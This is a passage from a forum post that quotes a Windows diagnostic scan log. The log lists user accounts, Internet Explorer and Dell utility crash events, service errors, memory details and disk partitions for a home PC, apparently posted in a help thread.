(S-1-5-21-1776543140-210536247-3466770518-1000 - Administrator - Enabled) => C:\Users\Gary Guest (S-1-5-21-1776543140-210536247-3466770518-501 - Limited - Enabled) => C:\Users\Guest HomeGroupUser$ (S-1-5-21-1776543140-210536247-3466770518-1002 - Limited - Enabled) Katie (S-1-5-21-1776543140-210536247-3466770518-1005 - Limited - Enabled) => C:\Users\Katie Linda (S-1-5-21-1776543140-210536247-3466770518-1003 - Limited - Enabled) => C:\Users\Linda Nick (S-1-5-21-1776543140-210536247-3466770518-1004 - Limited - Enabled) => C:\Users\Nick ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/01/2014 10:47:46 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22 Exception code: 0xc00000fd Fault offset: 0x000b18b2 Faulting process id: 0x4cbc Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/01/2014 08:44:08 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22 Exception code: 0xc00000fd Fault offset: 0x00094fce Faulting process id: 0x16f4 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/01/2014 06:13:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22 Exception code: 0xc00000fd Fault offset: 0x00094fbf Faulting process id: 0x3b94 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/01/2014 05:21:33 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22 Exception code: 0xc00000fd Fault offset: 0x00095c91 Faulting process id: 0x2990 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/01/2014 04:46:11 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22 Exception code: 0xc00000fd Fault offset: 0x00095c91 Faulting process id: 0x2cc0 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80040154, Class not registered . Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 22) (User: ) Description: Volume Shadow Copy Service error: A critical component required by the Volume Shadow Copy service is not registered. This might happened if an error occurred during Windows setup or during installation of a Shadow Copy provider. The error returned from CoCreateInstance on class with CLSID {0b5a2c52-3eb9-470a-96e2-6c6d4570e40f} and Name Coordinator is [0x80040154, Class not registered ]. Error: (11/01/2014 01:24:07 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program IEXPLORE.EXE version 11.0.9600.17344 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 26c0 Start Time: 01cff593c23e4abe Termination Time: 0 Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE Report Id: Error: (10/31/2014 11:41:27 PM) (Source: AVLogEvent) (EventID: 5005) (User: NT AUTHORITY) Description: Content is missing. Error Code:a7f42014 Error: (10/31/2014 08:18:19 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: pcdrcui.exe, version: 6.0.6426.22, time stamp: 0x52cfadb3 Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a Exception code: 0xe0434352 Fault offset: 0x000000000000940d Faulting process id: 0x39cc Faulting application start time: 0xpcdrcui.exe0 Faulting application path: pcdrcui.exe1 Faulting module path: pcdrcui.exe2 Report Id: pcdrcui.exe3 System errors: ============= Error: (11/01/2014 01:20:15 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/01/2014 01:18:58 AM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the SftService service. Error: (11/01/2014 01:18:59 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {211EBA3A-EA5A-496B-A021-5C6BEB365E4C} Error: (10/31/2014 11:42:29 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (10/31/2014 11:41:29 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: The following boot-start or system-start driver(s) failed to load: RxFilter Error: (10/31/2014 11:41:08 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The SessionLauncher service failed to start due to the following error: %%3 Error: (10/31/2014 11:41:08 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The Pml Driver HPZ12 service terminated with the following error: %%2 Error: (10/31/2014 11:41:08 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The Net Driver HPZ12 service terminated with the following error: %%2 Error: (10/31/2014 08:43:17 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF} Error: (10/31/2014 08:43:14 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 70. The internal error state is 105. Microsoft Office Sessions: ========================= Error: (11/01/2014 11:05:48 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: pcdrcui.exe6.0.6426.2252cfadb3KERNELBASE.dll6.1.7601.184095315a05ae0434352000000000000940d403801cff5e548bb0fb8C:\Program Files\My Dell\pcdrcui.exeC:\Windows\system32\KERNELBASE.dll8f4fbf7d-61d8-11e4-8c81-0025648bf898 Error: (11/01/2014 11:05:46 AM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application: pcdrcui.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: Pcd.DataStore.DatabaseError Stack: at Pcd.DataStore.AppStateDataStore..ctor() at pcd.models.properties.UserSetting.Init() at pcd.controllers.MainController.InitializeProperties() at pcd.controllers.MainController.BackgroundStartThread() at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) at System.Threading.ThreadHelper.ThreadStart() Error: (11/01/2014 10:47:46 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd000b18b24cbc01cff5e2b8ec43e3C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll0a87a3ea-61d6-11e4-8c81-0025648bf898 Error: (11/01/2014 08:44:08 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fce16f401cff5d07638ba88C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllc4e28658-61c4-11e4-8c81-0025648bf898 Error: (11/01/2014 06:13:06 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00094fbf3b9401cff5bc29cd810fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dllab406e96-61af-11e4-8c81-0025648bf898 Error: (11/01/2014 05:21:33 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00095c91299001cff5b42c55af55C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll76d2dab8-61a8-11e4-8c81-0025648bf898 Error: (11/01/2014 04:46:11 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7MSHTML.dll11.0.9600.17344541b8a22c00000fd00095c912cc001cff5afa7e4d37cC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll8763b17d-61a3-11e4-8c81-0025648bf898 Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 8193) (User: ) Description: CoCreateInstance0x80040154, Class not registered Error: (11/01/2014 01:40:37 AM) (Source: VSS) (EventID: 22) (User: ) Description: {0b5a2c52-3eb9-470a-96e2-6c6d4570e40f}Coordinator0x80040154, Class not registered Error: (11/01/2014 01:24:07 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: IEXPLORE.EXE11.0.9600.1734426c001cff593c23e4abe0C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE CodeIntegrity Errors: =================================== Date: 2012-03-14 18:51:27.927 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\WINDOWS\System32\drivers\usbaapl64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2012-03-14 18:51:27.877 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\WINDOWS\System32\drivers\usbaapl64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz Percentage of memory in use: 55% Total physical RAM: 6134.99 MB Available physical RAM: 2743.25 MB Total Pagefile: 12268.16 MB Available Pagefile: 7228.02 MB Total Virtual: 8192 MB Available Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:689.47 GB) (Free:443.55 GB) NTFS Drive f: (Expansion Drive) (Fixed) (Total:931.51 GB) (Free:318.95 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: C796C701) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=9.1 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=689.5 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 931.5 GB) (Disk ID: 0013EBBB) Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== End Of Log ==================== [/QUOTE]
Insert quotes…
Verification
Post reply
Top